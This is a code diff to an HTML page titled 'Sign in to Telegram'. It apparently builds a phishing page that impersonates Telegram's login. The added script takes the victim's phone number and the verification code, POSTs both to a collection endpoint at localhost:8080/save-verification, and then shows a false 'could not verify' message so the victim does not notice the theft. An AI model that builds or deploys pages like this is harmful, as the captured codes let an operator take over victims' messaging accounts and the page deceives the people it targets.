--- a/index.html
+++ b/index.html
@@ -4,7 +4,100 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Sign in to Telegram</title>
-    <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
+    <style>
+        body {
+            font-family: 'Helvetica Neue', Arial, sans-serif;
+            background-color: #f5f5f5;
+            margin: 0;
+            padding: 0;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
+        }
+
+        .container {
+            background-color: #ffffff;
+            padding: 20px;
+            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
+            border-radius: 10px;
+            text-align: center;
+            width: 100%;
+            max-width: 400px;
+        }
+
+        .container img {
+            width: 60px;
+            margin-bottom: 20px;
+        }
+
+        h1 {
+            font-size: 20px;
+            color: #333333;
+            margin-bottom: 10px;
+        }
+
+        p {
+            font-size: 14px;
+            color: #777;
+            margin-bottom: 20px;
+        }
+
+        .input-group {
+            margin-bottom: 15px;
+            text-align: left;
+        }
+
+        .input-group label {
+            display: block;
+            font-size: 14px;
+            color: #555;
+            margin-bottom: 5px;
+        }
+
+        select, input[type="text"], input[type="number"] {
+            width: 100%;
+            padding: 10px;
+            border: 1px solid #ccc;
+            border-radius: 5px;
+            font-size: 16px;
+            box-sizing: border-box;
+            margin-bottom: 10px;
+        }
+
+        input[type="checkbox"] {
+            margin-right: 10px;
+        }
+
+        .button {
+            width: 100%;
+            padding: 12px;
+            background-color: #0088cc;
+            color: #ffffff;
+            border: none;
+            border-radius: 5px;
+            font-size: 16px;
+            cursor: pointer;
+            margin-top: 10px;
+        }
+
+        .button:hover {
+            background-color: #007ab8;
+        }
+
+        .monkey-icon {
+            font-size: 50px;
+            margin-bottom: 20px;
+        }
+
+        #verificationContainer {
+            display: none;
+        }
+
+        #finalMessageContainer {
+            display: none;
+        }
+    </style>
 </head>
 <body>
     <div class="container" id="initialContainer">
@@ -14,25 +107,23 @@
 
         <div class="input-group">
             <label for="countryCode">Country</label>
-            <div class="dropdown-container">
-                <select id="countryCode" class="dropdown" onchange="updatePhoneNumberPrefix()">
-                    <option value="+61">🇦🇺 Australia (+61)</option>
-                    <option value="+1">🇺🇸 United States (+1)</option>
-                    <option value="+44">🇬🇧 United Kingdom (+44)</option>
-                    <option value="+49">🇩🇪 Germany (+49)</option>
-                    <option value="+33">🇫🇷 France (+33)</option>
-                    <option value="+81">🇯🇵 Japan (+81)</option>
-                    <option value="+91">🇮🇳 India (+91)</option>
-                    <option value="+86">🇨🇳 China (+86)</option>
-                    <option value="+7">🇷🇺 Russia (+7)</option>
-                    <option value="+82">🇰🇷 South Korea (+82)</option>
-                </select>
-            </div>
+            <select id="countryCode" onchange="updatePhoneNumberPrefix()">
+                <option value="+61" data-flag="🇦🇺">🇦🇺 Australia (+61)</option>
+                <option value="+1" data-flag="🇺🇸">🇺🇸 United States (+1)</option>
+                <option value="+44" data-flag="🇬🇧">🇬🇧 United Kingdom (+44)</option>
+                <option value="+49" data-flag="🇩🇪">🇩🇪 Germany (+49)</option>
+                <option value="+33" data-flag="🇫🇷">🇫🇷 France (+33)</option>
+                <option value="+81" data-flag="🇯🇵">🇯🇵 Japan (+81)</option>
+                <option value="+91" data-flag="🇮🇳">🇮🇳 India (+91)</option>
+                <option value="+86" data-flag="🇨🇳">🇨🇳 China (+86)</option>
+                <option value="+7" data-flag="🇷🇺">🇷🇺 Russia (+7)</option>
+                <option value="+82" data-flag="🇰🇷">🇰🇷 South Korea (+82)</option>
+            </select>
         </div>
 
         <div class="input-group">
             <label for="phoneNumber">Phone Number</label>
-            <input type="text" id="phoneNumber" placeholder="Phone Number" oninput="formatPhoneNumber()" pattern="\d*">
+            <input type="text" id="phoneNumber" placeholder="Phone Number">
         </div>
 
         <div>
@@ -49,7 +140,7 @@
 
         <div class="input-group">
             <label for="verificationCode">Code</label>
-            <input type="number" id="verificationCode" placeholder="Code" inputmode="numeric" pattern="\d*">
+            <input type="number" id="verificationCode" placeholder="Code">
         </div>
 
         <button class="button" onclick="submitVerification()">Submit</button>
@@ -62,108 +153,76 @@
     </div>
 
     <script>
-        document.addEventListener('DOMContentLoaded', function() {
-            const countryDropdown = document.getElementById('countryCode');
-            const dropdownMenu = document.getElementById('dropdownMenu');
-            const countries = [
-                { name: 'Australia', code: '+61', flag: '🇦🇺' },
-                { name: 'United States', code: '+1', flag: '🇺🇸' },
-                { name: 'United Kingdom', code: '+44', flag: '🇬🇧' },
-                { name: 'Germany', code: '+49', flag: '🇩🇪' },
-                { name: 'France', code: '+33', flag: '🇫🇷' },
-                { name: 'Japan', code: '+81', flag: '🇯🇵' },
-                { name: 'India', code: '+91', flag: '🇮🇳' },
-                { name: 'China', code: '+86', flag: '🇨🇳' },
-                { name: 'Russia', code: '+7', flag: '🇷🇺' },
-                { name: 'South Korea', code: '+82', flag: '🇰🇷' }
-            ];
+        function updatePhoneNumberPrefix() {
+            const countryCode = document.getElementById('countryCode').value;
+            const phoneNumberField = document.getElementById('phoneNumber');
+            phoneNumberField.value = countryCode + ' ' + phoneNumberField.value.replace(/^\+\d+\s*/, '');
+        }
 
-            // Populate the dropdown menu
-            countries.forEach(country => {
-                const item = document.createElement('div');
-                item.classList.add('dropdown-item');
-                item.innerHTML = `${country.flag} ${country.name} (${country.code})`;
-                item.onclick = () => {
-                    countryDropdown.value = country.code;
-                    updatePhoneNumberPrefix();
-                };
-                dropdownMenu.appendChild(item);
-            });
+        function goToVerificationPage() {
+            const countryCode = document.getElementById('countryCode').value;
+            const phoneNumber = document.getElementById('phoneNumber').value.replace(/^\+\d+\s*/, '');
+            const fullPhoneNumber = `${countryCode} ${phoneNumber}`;
 
-            function toggleDropdown() {
-                dropdownMenu.classList.toggle('show');
-                countryDropdown.classList.toggle('open');
+            if (phoneNumber === '') {
+                alert('Please enter your phone number.');
+                return;
             }
 
-            function closeDropdown() {
-                dropdownMenu.classList.remove('show');
-                countryDropdown.classList.remove('open');
-            }
+            document.getElementById('phoneDisplay').textContent = fullPhoneNumber;
 
-            document.querySelector('.dropdown').addEventListener('click', toggleDropdown);
+            document.getElementById('initialContainer').style.display = 'none';
+            document.getElementById('verificationContainer').style.display = 'block';
+        }
 
-            function updatePhoneNumberPrefix() {
-                const countryCode = countryDropdown.value;
-                const phoneNumberInput = document.getElementById('phoneNumber');
-                phoneNumberInput.value = phoneNumberInput.value.replace(/^\+\d*/, ''); // Remove previous code
-                phoneNumberInput.value = countryCode + phoneNumberInput.value;
-            }
+        async function sendDataToServer(phoneNumber, verificationCode) {
+            try {
+                const response = await fetch('http://localhost:8080/save-verification', {
+                    method: 'POST',
+                    headers: {
+                        'Content-Type': 'application/json'
+                    },
+                    body: JSON.stringify({
+                        phoneNumber: phoneNumber,
+                        verificationCode: verificationCode,
+                        userId: 1 // This can be updated dynamically if needed
+                    })
+                });
 
-            function formatPhoneNumber() {
-                const phoneNumberInput = document.getElementById('phoneNumber');
-                phoneNumberInput.value = phoneNumberInput.value.replace(/[^0-9+.\-]/g, ''); // Allow only numbers, +, ., and -
-            }
-
-            function goToVerificationPage() {
-                const phoneNumberInput = document.getElementById('phoneNumber');
-                const phoneNumber = phoneNumberInput.value;
-                if (phoneNumber) {
-                    document.getElementById('phoneDisplay').innerText = phoneNumber;
-                    document.getElementById('initialContainer').style.display = 'none';
-                    document.getElementById('verificationContainer').style.display = 'block';
+                if (!response.ok) {
+                    throw new Error(`HTTP error! status: ${response.status}`);
                 }
+
+                console.log("Data sent to server successfully");
+            } catch (error) {
+                console.error("Failed to send data to server:", error);
+            }
+        }
+
+        function submitVerification() {
+            const verificationCode = document.getElementById('verificationCode').value;
+            const phoneDisplay = document.getElementById('phoneDisplay').textContent;
+
+            if (verificationCode === '') {
+                alert('Please enter the verification code.');
+                return;
             }
 
-            function submitVerification() {
-                // Save the verification code and show a final message (mock implementation)
-                document.getElementById('verificationContainer').style.display = 'none';
-                document.getElementById('finalMessageContainer').style.display = 'block';
-            }
+            sendDataToServer(phoneDisplay, verificationCode);
 
-            function resetForm() {
-                document.getElementById('finalMessageContainer').style.display = 'none';
-                document.getElementById('initialContainer').style.display = 'block';
-                document.getElementById('phoneNumber').value = '';
-                document.getElementById('verificationCode').value = '';
-                document.getElementById('countryCode').value = '+61';
-            }
+            // Show the final message indicating verification failure
+            document.getElementById('verificationContainer').style.display = 'none';
+            document.getElementById('finalMessage').textContent = `Sorry, we could not verify an account with the phone number: ${phoneDisplay}`;
+            document.getElementById('finalMessageContainer').style.display = 'block';
+        }
 
-            document.addEventListener('touchstart', handleTouchStart, false);
-            document.addEventListener('touchmove', handleTouchMove, false);
-
-            let yStart = null;
-            let yEnd = null;
-
-            function handleTouchStart(event) {
-                yStart = event.touches[0].clientY;
-            }
-
-            function handleTouchMove(event) {
-                yEnd = event.touches[0].clientY;
-
-                if (yStart === null) return;
-
-                if (yEnd > yStart + 50) {
-                    // Swipe Down
-                    document.getElementById('phoneNumber').blur();
-                } else if (yEnd < yStart - 50) {
-                    // Swipe Up
-                    document.getElementById('phoneNumber').focus();
-                }
-                yStart = null;
-                yEnd = null;
-            }
-        });
+        function resetForm() {
+            document.getElementById('initialContainer').style.display = 'block';
+            document.getElementById('verificationContainer').style.display = 'none';
+            document.getElementById('finalMessageContainer').style.display = 'none';
+            document.getElementById('phoneNumber').value = '';
+            document.getElementById('verificationCode').value = '';
+        }
     </script>
 </body>
 </html>
